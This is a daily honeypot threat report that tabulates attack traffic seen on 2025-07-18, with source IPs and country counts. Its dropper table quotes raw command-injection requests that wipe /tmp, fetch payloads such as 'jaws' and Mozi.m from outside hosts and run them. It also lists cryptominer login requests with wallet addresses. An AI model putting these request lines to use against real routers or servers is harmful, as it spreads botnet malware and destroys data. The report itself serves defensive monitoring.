Skip to main content
  1. Daily-Posts/

Report: 2025-07-18

·474 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-18
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 10 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 25 new requests that have never been observed before (these were added to the monitored request database.).

A total of 757 requests were recorded during the day, originating from 10 different countries, with a peak of 162 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
39.108.173.165GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.236.162GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.133.204GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.246.41GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
139.196.172.210GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
174.138.30.7GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.188.210GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
103.207.224.12327;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
103.93.93.162GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.93.93.162:47689/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
8.222.203.73GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
682CONNECT ipscore.vexhub.dev:443 HTTP/1.1
1481\x00\x0E\x081\xA7\x94\xED\x88\x834m\x00\x00\x00\x00\x00
1491\x00\x0E81\xA7\x94\xED\x88\x834m\x00\x00\x00\x00\x00
1581\x00\x0E\x08/\x11\xAE\x88}\x9D\xCD\xC5\x00\x00\x00\x00\x00
1591\x00\x0E8/\x11\xAE\x88}\x9D\xCD\xC5\x00\x00\x00\x00\x00
1841GET /odinhttpcall1752800331 HTTP/1.1
1851GET /OdinHttpCall1752800331 HTTP/1.1
1861GET /Odin/http/call1752800331 HTTP/1.1
1911GET /odinhttpcall1752800381 HTTP/1.1
1921GET /OdinHttpCall1752800381 HTTP/1.1
1931GET /Odin/http/call1752800381 HTTP/1.1
2081GET /v1/users/login HTTP/1.1
2091GET /v1/users/users/login HTTP/1.1
2111{\x22id\x22: 1, \x22method\x22: \x22mining.subscribe\x22, \x22params\x22: [], \x22jsonrpc\x22:\x222.0\x22}
2131{\x22id\x22: 1, \x22jsonrpc\x22: \x222.0\x22, \x22method\x22: \x22login\x22, \x22params\x22: { \x22login\x22: \x2248edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD\x22, \x22pass\x22: \x22x\x22, \x22agent\x22: \x22XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0\x22}}
2151{\x22id\x22: 1, \x22method\x22: \x22eth_submitLogin\x22, \x22params\x22: []}
2171{\x22id\x22: 1, \x22method\x22: \x22mining.subscribe\x22, \x22params\x22: [\x22EthereumStratum/1.0.0\x22]}
2191{\x22id\x22: 1, \x22method\x22: \x22mining.hello\x22, \x22params\x22: {\x22agent\x22:\x22ethminer-0.17\x22,\x22host\x22:\x22xxx.xxx.xxx.xxx\x22, \x22port\x22:\x2250\x22,\x22proto\x22:\x22EthereumStratum/2.0.0\x22}}
2201\x00\x01\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00
2211\xFF\xFD\x01
2311\x04\x01\x00P\xC4\xFBU>\x00
2321CONNECT 196.251.85.62:80 HTTP/1.0
2491{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x69f997ce12be08f803fd84931767c6c2aa3e9835\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
2501{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2249GZ6PaxC8S51isRNDEj3tTfPFosskEyvKccB4x1fHTeTiYRBSrJYDadWUV1UD9JQH5JVEGPSe2NTa81687NW4qQS13yqUF\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2681\x0F\x00\x00\x00G\xC40~\x97\x01\x00\x00\xCA\x01\xB4

country_iso_code
#

number_of_occurencecountry_iso_code
0162US
199DE
266PL
362SG
447NL
545SE
644GB
735HK
831BG
924ES
1022JP
1119CA
1217NG
1314IN
149PT
157BE
167CN
176SC
184IR
193KZ
203IE
213HU
222CO
232ZA
242RU
252RO
262KR
272AU
281MC
291CR
301FI
311BD
321KH
331GR
341AZ
351AR
361BR
371FR
381IL
391ID
401MX
411AO
421IQ
431LT

Related

Report: 2025-07-17
·463 words
Repport Daily
Report: 2025-07-16
·389 words
Repport Daily
Report: 2025-07-15
·597 words
Repport Daily